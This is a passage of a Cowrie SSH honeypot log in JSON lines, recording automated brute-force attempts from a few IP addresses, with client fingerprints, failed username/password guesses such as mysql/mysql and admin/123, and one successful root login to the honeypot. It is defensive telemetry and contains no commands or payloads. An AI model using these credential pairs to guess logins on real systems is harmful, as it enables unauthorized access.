56","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:08.700628Z","src_ip":"212.227.235.229","session":"8913cfb14110"}
{"eventid":"cowrie.login.failed","username":"pizza","password":"pizza","message":"login attempt [pizza/pizza] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:11.412855Z","src_ip":"212.227.235.229","session":"8913cfb14110"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42422,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e2e112c5992","protocol":"ssh","message":"New connection: 212.227.235.229:42422 (1.2.3.4:22) [session: 0e2e112c5992]","sensor":"my-vps","timestamp":"2025-08-31T04:58:12.409112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:12.410624Z","src_ip":"212.227.235.229","session":"0e2e112c5992"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:12.684201Z","src_ip":"212.227.235.229","session":"0e2e112c5992"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:14.240871Z","src_ip":"212.227.235.229","session":"8913cfb14110"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"123456","message":"login attempt [monitor/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:15.044022Z","src_ip":"212.227.235.229","session":"0e2e112c5992"}
{"eventid":"cowrie.session.closed","duration":"32.7","message":"Connection lost after 32.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:16.353143Z","src_ip":"212.227.125.160","session":"2d290a7dbca9"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:17.373038Z","src_ip":"212.227.235.229","session":"0e2e112c5992"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51200,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cf282470579","protocol":"ssh","message":"New connection: 212.227.235.229:51200 (1.2.3.4:22) [session: 6cf282470579]","sensor":"my-vps","timestamp":"2025-08-31T04:58:20.045098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:20.322730Z","src_ip":"212.227.235.229","session":"6cf282470579"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:21.131945Z","src_ip":"212.227.235.229","session":"6cf282470579"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55390,"dst_ip":"1.2.3.4","dst_port":22,"session":"23a88529fb48","protocol":"ssh","message":"New connection: 212.227.235.229:55390 (1.2.3.4:22) [session: 23a88529fb48]","sensor":"my-vps","timestamp":"2025-08-31T04:58:22.177395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:22.331194Z","src_ip":"212.227.235.229","session":"23a88529fb48"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:22.446075Z","src_ip":"212.227.235.229","session":"23a88529fb48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51218,"dst_ip":"1.2.3.4","dst_port":22,"session":"e35a21350316","protocol":"ssh","message":"New connection: 212.227.235.229:51218 (1.2.3.4:22) [session: e35a21350316]","sensor":"my-vps","timestamp":"2025-08-31T04:58:22.867466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:22.988409Z","src_ip":"212.227.235.229","session":"e35a21350316"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:23.050914Z","src_ip":"212.227.235.229","session":"6cf282470579"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:23.139344Z","src_ip":"212.227.235.229","session":"e35a21350316"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":38975,"dst_ip":"1.2.3.4","dst_port":22,"session":"90dcace726ad","protocol":"ssh","message":"New connection: 80.94.95.15:38975 (1.2.3.4:22) [session: 90dcace726ad]","sensor":"my-vps","timestamp":"2025-08-31T04:58:23.522013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:23.522846Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:58:23.574717Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:23.859879Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55402,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dd7c7f5182a","protocol":"ssh","message":"New connection: 212.227.235.229:55402 (1.2.3.4:22) [session: 5dd7c7f5182a]","sensor":"my-vps","timestamp":"2025-08-31T04:58:24.429032Z"}
{"eventid":"cowrie.login.failed","username":"cpanel","password":"72b1bd75ac87852a","message":"login attempt [cpanel/72b1bd75ac87852a] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:24.526034Z","src_ip":"212.227.235.229","session":"e35a21350316"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:24.748475Z","src_ip":"212.227.235.229","session":"5dd7c7f5182a"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:24.912054Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:25.088039Z","src_ip":"212.227.235.229","session":"6cf282470579"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:25.171350Z","src_ip":"212.227.235.229","session":"23a88529fb48"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"12345","message":"login attempt [ftp/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:25.964604Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:26.171916Z","src_ip":"212.227.235.229","session":"e35a21350316"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:26.290814Z","src_ip":"212.227.235.229","session":"5dd7c7f5182a"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:26.537442Z","src_ip":"212.227.235.229","session":"23a88529fb48"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:27.017225Z","src_ip":"80.94.95.15","session":"90dcace726ad"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890%*()","message":"login attempt [root/1234567890%*()] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:58:27.335100Z","src_ip":"212.227.235.229","session":"5dd7c7f5182a"}
